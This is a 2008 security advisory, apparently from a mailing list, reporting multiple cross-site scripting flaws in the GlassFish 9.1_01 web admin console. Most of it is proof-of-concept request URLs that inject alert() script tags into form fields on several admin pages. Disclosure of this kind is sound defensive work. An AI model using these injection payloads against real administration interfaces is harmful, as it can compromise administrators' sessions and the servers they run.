Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

E-SMART CART (productsofcat. asp) Remote SQL Injection Vulnerability

PHP JOBWEBSITE PRO (JobSearch3. php) SQL Injection Vulnerability

[ECHO_ADV_98$2008] Pre Ads Portal <= 2.0 Sql Injection Vulnerability

[ECHO_ADV_97$2008] Pre News Manager <= 1.0 (index.php id) Sql Injection Vulnerability

From:	Eduardo Jorge <serrano.neves_(at)_gmail.com>
Date:	16.06.2008
Subject:	Muitiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )

==============================

Muitiple XSS - Glassfish Web Interface (Sun Java System Application
Server 9.1_01 (build b09d-fcs) )

==============================

Author: Eduardo Neves a.k.a _eth0_
Date: 14 june 2008
Site: http://webappsecurity.wordpress.com

==============================

APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/

==============================

IMPACT: XSS, XSRF, etc.

Severity: Low (or not?)

==============================

Descrition:

This vulnerability affect some webpages in the glassfish webadmin interface,
that vulnerability allow user can insert a malicious or a not expected input
data in the input type field.That was found in 10+ input data field in
glassfish.

This is a vulnerable URL:

http://[HOSTNAME]:4848/resourceNode/customResourceNew.
jsf?propertyForm%3Aproper
tyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3Aprop
ertyContentPage
%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%
3Cscript%3Ealer
t%28%27xss%27%29%3B%3C%2Fscript%3E&propertyFo
rm%3ApropertyContentPage%3Aproperty
Sheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript
%3Ealert%28%27x
ss%27%29%3B%3C%2Fscript%3E&propertyForm%3Apropert
yContentPage%3ApropertySheet%3A
propertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%
3Ealert%28%2
7xss%27%29%3B%3C%2Fscript%3E&propertyForm%3Aprope
rtyContentPage%3ApropertySheet%
3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%
28%27xss%27%29%3B%
3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertyS
heet%3ApropertSecti
onTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3Ahelp
Key=customresou
rcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.
ViewState=j_
id276%3Aj_id282&com_sun_webui_util_FocusManager_focusElementId=propertyFo
rm%3Apr
opertyContentPage%3AtopButtons%3AnewButton


http://[HOSTNAME]:4848/resourceNode/externalResourceNew.
jsf?propertyForm%3Aprope
rtyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3Apro
pertyContentPag
e%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=
%3Cscript%3Eale
rt%28%27xss%27%29%3B%3C%2Fscript%3E&propertyF
orm%3ApropertyContentPage%3Apropert
ySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscrip
t%3Ealert%28%27
xss%27%29%3B%3C%2Fscript%3E&propertyForm%3Aproper
tyContentPage%3ApropertySheet%3
ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%
3Ealert%28%
27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3Aprop
ertyContentPage%3ApropertySheet
%3ApropertSectionTextField%3AjndiLookupProp%3AjndiLookup=%3Cscrip
t%3Ealert%28%27
xss%27%29%3B%3C%2Fscript%3E&propertyForm%3Aproper
tyContentPage%3ApropertySheet%3
ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%
28%27xss%27%29%3B%3
C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySh
eet%3ApropertSectio
nTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3Aprope
rtyContentPage%
3AhelpKey=externalresourcescreate.
html&propertyForm_hidden=propertyForm_hidden&j
avax.faces.
ViewState=j_id289%3Aj_id293&com_sun_webui_util_FocusManager_focusElem
entId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/resourceNode/jmsDestinationNew.
jsf?propertyForm%3Apropert
yContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3Aprope
rtySheet%3Aprop
ertSectionTextField%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%
27xss%27%29%3B%3C%2Fs
cript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%
3AnameProp%3Anam
e=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fsc
ript%3E&propertyForm%3ApropertyShee
t%3ApropertSectionTextField%3AresTypeProp%3AresType=javax.jms.
Topic&propertyForm
%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%
3Cscript%3Ealert%2
8%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%
3ApropertySheet%3ApropertSectionTex
tField%3AstatusProp%3Acb=true&propertyForm%3AbasicTable%3Arow
Group1%3A0%3Acol2%3
Acol1St=Description&propertyForm%3AbasicTable%3ArowGroup1%3A0%
3Acol3%3Acol1St=&p
ropertyForm%3AhelpKey=jmsdestinationnew.
html%09&propertyForm_hidden=propertyForm
_hidden&javax.faces.
ViewState=j_id242%3Aj_id246&com_sun_webui_util_FocusManager_
focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewB
utton

http://[HOSTNAME]:4848/resourceNode/jmsConnectionNew.
jsf?propertyForm%3Aproperty
ContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3Aproper
tySheet%3Agener
alPropertySheet%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27
xss%27%29%3B%3C%2Fscrip
t%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3Are
sTypeProp%3AresType
=javax.jms.
TopicConnectionFactory&propertyForm%3ApropertySheet%3AgeneralProperty

Sheet%3AdescProp%3Acd=%3Cscript%3Ealert%28%27xss2%27%
29%3B%3C%2Fscript%3E&proper
tyForm%3ApropertySheet%3AgeneralPropertySheet%3AstatusProp%3Asun_
checkbox9=true&
propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AinitSizePr
op%3Ads=8&p
ropertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxProp%
3Ads2=32&prope
rtyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AresizeProp%
3Ads3=2&propert
yForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AidleProp%3Ads
=300&propertyFo
rm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxWaitProp%3Ads
=60000&property
Form%3ApropertySheet%3ApoolSettingsPropertySheet%3Atransprop%3Atr
ans=&propertyFo
rm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Password&
propertyForm%3AbasicTab
le%3ArowGroup1%3A0%3Acol3%3Acol1St=guest&propertyForm%3Ab
asicTable%3ArowGroup1%3
A1%3Acol2%3Acol1St=UserName&propertyForm%3AbasicTable%3ArowGr
oup1%3A1%3Acol3%3Ac
ol1St=guest&propertyForm%3AhelpKey=jmsconnectionnew.
html&propertyForm_hidden=pro
pertyForm_hidden&javax.faces.
ViewState=j_id226%3Aj_id234&com_sun_webui_util_Focu
sManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%


http://[HOSTNAME]:4848/resourceNode/jdbcResourceNew.
jsf?propertyForm%3ApropertyC
ontentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3Apropert
ySheet%3Aproper
tSectionTextField%3AjndiProp%3Ajnditext=<script>alert('xss'
);</script>&propertyF
orm%3ApropertySheet%3ApropertSectionTextField%3ApoolNameProp%3APo
olName=__CallFl
owPool&propertyForm%3ApropertySheet%3ApropertSectionTextField%3Ad
escProp%3Adesc=
<script>alert('xss3');</script>&propertyForm%
3ApropertySheet%3ApropertSectionTex
tField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=j
dbcresourcenew.
html&propertyForm_hidden=propertyForm_hidden&javax.faces.
ViewState=j_id185%3Aj_i
d201&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3Aproper
tyConte
ntPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/applications/lifecycleModulesNew.
jsf?propertyForm%3Aprope
rtyContentPage%3ApropertySheet%3ApropertSectionTextField%3AnameProp%
3Aname=<scri
pt>alert('xss');</script>&propertyForm%3Apropert
yContentPage%3ApropertySheet%3Ap
ropertSectionTextField%3AclassNameProp%3Aclassname=<script>alert(
'xss2');</scrip
t>&propertyForm%3ApropertyContentPage%3ApropertySheet%3Aproper
tSectionTextField%
3ApathProp%3AclassPath=&propertyForm%3ApropertyContentPage%3Aprop
ertySheet%3Apro
pertSectionTextField%3AloadOrderProp%3AloadOrder=<script>alert(
'xss3');</script>
&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSect
ionTextField%3A
descProp%3Adesc=&propertyForm%3ApropertyContentPage%3ApropertyShe
et%3ApropertSec
tionTextField%3AstatusProp%3Asun_checkbox8=true&propertyForm%3Apr
opertyContentPa
ge%3AbottomButtons%3AsaveButton2=++OK++&propertyForm%3AhelpKey=li
fecyclemodules.
html&propertyForm_hidden=propertyForm_hidden&javax.faces.
ViewState=j_id117%3Aj_i
d125&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3Aproper
tyConte
ntPage%3AbottomButtons%3AsaveButton2

http://[HOSTNAME]:4848/resourceNode/jdbcConnectionPoolNew1.
jsf?propertyForm%3Apr
opertyContentPage%3AtopButtons%3AnextButton=+Next+&propertyForm%3
ApropertyConten
tPage%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3Aname=<
script>alert('xs
s')</script>&propertyForm%3ApropertyContentPage%3Aprope
rtySheet%3AgeneralPropert
ySheet%3AresTypeProp%3AresType=<script>alert('xss2')
;</script>&propertyForm%3Apr
opertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AdbProp%
3Adb=<script>a
lert('xss3');</script>&propertyForm%3AhelpKey=jdbcc
onnectionpoolnew1.html&proper
tyForm_hidden=propertyForm_hidden&javax.faces.
ViewState=j_id7%3Aj_id34&com_sun_w
ebui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%
3AtopBu
ttons%3AnextButton

And others =)

--
|_|0|_| Serrano Neves - a.k.a eth0
|_|_|0| http://webappsecurity.wordpress.com
|0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds